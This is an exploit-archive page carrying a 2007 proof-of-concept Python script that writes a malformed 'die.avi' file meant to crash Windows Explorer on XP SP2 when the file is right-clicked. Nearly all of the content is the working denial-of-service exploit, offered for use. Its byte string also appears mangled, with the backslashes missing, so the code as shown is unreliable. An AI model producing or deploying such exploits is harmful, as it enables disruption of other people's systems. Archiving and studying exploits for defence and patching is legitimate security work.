[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MS Windows Explorer (AVI) Unspecified Denial of Service Exploit
# Published : 2007-01-24
# Author : shinnai
# Previous Title : Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)
# Next Title : Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit


print "-----------------------------------------------------------------------------------"
print "Explorer.exe version 6.0.2900.2180 .avi file Denial of Service"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Tested on Windows XP Professional SP2 all patched"
print "right click of the mouse on the file to see Explorer.exe die"
print "-----------------------------------------------------------------------------------"

fileOut = open('die.avi','wb')
fileOut.write('x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00')
fileOut.close()

# www.Syue.com [2007-01-24]